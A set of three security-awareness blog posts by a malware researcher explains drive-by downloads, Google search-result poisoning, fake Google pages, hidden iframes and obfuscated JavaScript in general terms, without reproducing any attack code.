Beware of search engines helpers
You may come across some sites that offer online searches in cool formats. For example, we found this Italian website that does a search in both Google and Yahoo!.
It works well and presents the results in two diffent window panes:
However, digging into the source code for that page, we found an infamous drive-by download (loader.exe) that happens to be nothing less than a Trojan Downloader.
That Trojan will download additional malware (dialer, password stealer) onto your computer.
As a general rule, it is safer to use your search engine directly from the main site (i.e. google.com). Many sites offer a search from their own page that claims to search the major search engines. However, it is often biased results that are returned, or even worse, malicious programs.
JSegura
|
Google poisoning and impersonations
When we look for something on the Internet, most of us will think of using Google’s search engine. Actually for a lot of people, the Internet starts with a Google search. Google quickly surpassed its competitors and has established itself as the reference in terms of online searches.
With a mission of presenting the best results as quickly as possible comes a certain responsibility. Indeed, we, as Internet users, trust Google to guide us to links that are safe and match our search query. That same trust we have when we see the Google logo can easily be used by hackers to design Google templates that look like the original, but are in fact dangerous websites.
Should we blame the giant search engine if we land on a malicious page that infects our PC after clicking on one of the links? Legally, we may not, but if this situation happened too much, we might get fed up and start using another search engine.
There has been a lot of talk recently in the media about Google poisoning. Basically, hackers hijack Google’s search results so that their malicious sites appear in the top ten results. Hackers create tens of thousands of sites specially crafted for Search Engine Optimization which somehow find their way to the first results’ page.
Figure 1: malicious page appears on Google. Thousands of those pages can be created in a matter of minutes to flood the other legitimate sites.
To give the search engine credit, Google is trying to remove those links as soon as it can. It also flags a lot of sites as dangerous and prevents you from directly visiting them. Stopbadware.org has done a lot of work into listing dangerous sites and gives webmasters explanations and tips.
Lastly, Google is not the only victim of search results poisoning. Microsoft’s Live Search
has had its fair share too.
Figure 2: a warning from Google: “This site may harm your computer”
The other problem, although this time totally out of the hands of search engines, is lookalike sites. This paper will not talk about the larger problem that is phishing whose main goal is to capture sensitive information (username/password, credit card number etc.) by using social engineering and other technical subterfuges.
Figure 3: Real Google page
Figure 4: Fake Google page
Let’s take a closer look at the fake Google webpage. There are several areas that have been changed. Although visually it looks pretty close to the original, the source code clearly shows the work of a hacker. An obfuscated JavaScript will try to launch an exploit. Also, as if it was not enough, an add-on is required to do the ‘Google’ search properly. The add-on is actually a Worm that will infest the PC and propagate to other machines.
The icing on the cake (at least for us malware researchers) is the redirection to the AdultFriendFinder website, when clicking on the Sign in link. Normally, this takes you to a page where you put your username and password to log into your Google account. Instead, you will land on an adult site.
Figure 5: Source code for the Fake Google page. Notice the part that says “secret code”… This is obfuscated JavaScript that hides malicious code.
Figure 6: Social engineering trick to download and execute a Worm.
Figure 7: The Sign in link actually redirects you to AdultFriendFinder.com
Figure 8: AdultFriendFinder.com sponsored by a pretty dubious affiliate
It is no big surprise that hackers target Google. Millions of Internet users depend on the search engine everyday for their work or personal research. There is also a lot of money involved in Search Engine Optimization (SEO) because businesses heavily rely on being listed by Google. So many tricks have been used (and certainly will keep on being used) to increase a site’s ranking. Better ranking means better traffic, which translates into
sales.
Well, hackers are getting really good at SEO, and it opens the door to millions of potential victims. The hackers can then contact the Adware / Rogue companies and make a deal to deliver their products through their ‘sales channels’. It is certainly a bad practice, but again, having a good conscience is not very high on their priority list.
Jerome Segura
|
The hidden part of the web
The Internet has many facets which are difficult to quickly summarize but for the most part, people assimilate it with email, online shopping, blogs, multi-player games and so on…
All those activities are brought to us by a web browser which renders the code used to build each webpage. We rarely ever get to look at what is behind a page. Whether a site is using Java, Flash or is just a plain Html document, it doesn’t really matter to us. What we care about is that it looks good and it is easy to navigate.
Sometimes an apparently legitimate site will trigger an explosion of pop-ups or bring our computer to a crawl for no apparent reason. The problem is, we didn’t really see what happened because it was done “in our backs”.
In this paper we will go deep into the core of a webpage and expose the dangerous code responsible for infecting PCs.
A common expression used by security researchers is ‘drive-by download’. In a nutshell, it means that a download happens without the user’s knowledge. Another popular notion is ‘exploit’ which is a piece of code or commands that take advantage of a
bug or vulnerability in any application or Operating System with the intent to gain control of the machine.
Although a drive-by download is usually triggered by the user’s actions, it is not done willingly or wanted. Also, the sequence of actions following up a drive-by download can be done silently and stealthily to avoid the user’s awareness.
We will focus on browsing the web, as the main vector for drive-by downloads to occur. As mentioned earlier, web pages consist of lines of code that are interpreted by the web browser (Internet Explorer, Firefox). Most of the time, the code used is totally legitimate and actually makes the web page more user friendly and gives it many different functionalities. For example, some code will be able to determine what browser the user has, what the screen resolution is, etc. Therefore the webpages interact not only on their server side, but also locally on the client side which is the user’s PC.
IFrames
An Iframe is an HTML element that enables to embed a HTML document within an already existing one. Iframes are often used to insert ads within a webpage. To make it sound more simple, it is what Picture-in-Picture is to the TV. The dimensions of the
Iframe can be set up manually, which is an important point to mention. Hackers use Iframes as a way to embed a malicious website into a legitimate one.
Because hackers do not wish the users or even better the webmaster to notice them, they usually set their size as 0 for both width and height.
Figure 1: Two IFrames are inserted into the source code of the webpage.
JavaScript Obfuscation
Although Iframes are difficult to spot, malware authors want to make sure they are not detected by search engines and other security tools. One way of doing this is to write a piece of code containing an Iframe and obfuscate it so that it is not easily readable.
A lot of webmasters will actually legitimately use JavaScript code to protect the copyright of their website’s source code.
Unfortunately, the browser will decode and execute the code regardless of its intent.
Figure 2: Obfuscated Javascript hides a malicious URL
Other JavaScript malicious code
JavaScript enables a malware author to run malicious code on the victim’s computer. One example of this security problem is called cross-site scripting. It happens when an attacker can force a legitimate site to include a malicious script in the page presented to the current victim. (Note that the same legitimate website accessed by a different person on another computer is totally legitimate, which is different from a permanent Iframe infection that affects everyone accessing the site).
For example, if a user logs into his online banking website and at the same time opens up
another webpage, that second page can load malicious code and take control of the
banking website.
Figure 3: poorly written malicious JavaScript
Pure exploits
Exploits, also known as attacks, take advantage of software vulnerabilities. As alarming as that sounds, there are many known exploits still unpatched by Microsoft or other software companies. Blackhat hackers are constantly looking for new ways to find a bug in the common software or Operating Systems. Some exploits are released in the wild (out there on the Internet) before anybody has a fix for them. They are called ‘zero day exploits’.
Although we can patch our PCs for older exploits, we are still vulnerable to the zero-day ones.
Types of exploits include memory overflow, SQL injection, and other types of code injections.
Figure 4: a malicious DLL file caused an exception in Internet Explorer 7
As we saw, malware authors are using all sorts of techniques to distribute their malicious code. It’s not always in their interest to make it visible to the user. For example, some credit card or password stealing Trojan relies on being stealh and undetected.
There are many hot debates on which browser is most secure. After all, the browser is your gateway to the Internet. There is however a general consensus that Internet Explorer is one of the most unsafe browser. Because it is the default browser on Windows machines, it is heavily target by hackers. But vulnerabilities are not unique to Microsoft products, and concern everybody. Firefox, often praised as the most secure browser, has had its share and periodically patches itself up.
This is just a reminder that the online safety battle is far from being over.
Jerome Segura
|
